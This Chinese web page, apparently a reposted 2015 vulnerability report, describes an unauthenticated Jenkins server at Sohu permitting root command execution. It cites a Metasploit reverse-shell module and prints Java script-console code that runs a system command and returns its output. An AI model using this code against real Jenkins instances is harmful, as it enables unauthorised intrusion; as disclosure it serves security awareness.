鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

搜狐某系统未授权访问,致任意命令执行

来源:互联网 作者:佚名 时间:2015-10-19 08:40
主要是某系统为授权可访问,导致可执行任意命令,权限还是root,数据库未做访问限制,数据量很蛮大的。。 详细说明:此问题是由于他们使用了这个Jenkins系统。而且没有做访问控制。 那Jenkins是基于Java开发的一种持续集成工具,用于监控秩序重复的工作,如果

主要是某系统为授权可访问,导致可执行任意命令,权限还是root,数据库未做访问限制,数据量很蛮大的。。
详细说明:此问题是由于他们使用了这个Jenkins系统。而且没有做访问控制。

那Jenkins是基于Java开发的一种持续集成工具,用于监控秩序重复的工作,如果配置不当,可以发安全问题。为授权访问可以造成任意命令执行威胁,metasploit利用可以获得一个反向的shell具体看http://www.exploit-db.com/exploits/24272/。

 

当然,假如我们没有一个可以反向连接回来的机器,也可以在其脚本命令行处运行java代码来执行任意命令。利用代码如下:

 

Runtime runtime = Runtime.getRuntime();
    Process process = runtime.exec("id");
    process.getInputStream();
 
    BufferedReader br = new BufferedReader(new InputStreamReader(process.getInputStream()));
    String inline;
    String returnvalue = "";
    while ((inline = br.readLine()) != null) {
       returnvalue +=( inline );
    }
    br.close();
    out.println(returnvalue);



那后面可以干啥,大家就自己脑补吧

网友评论
<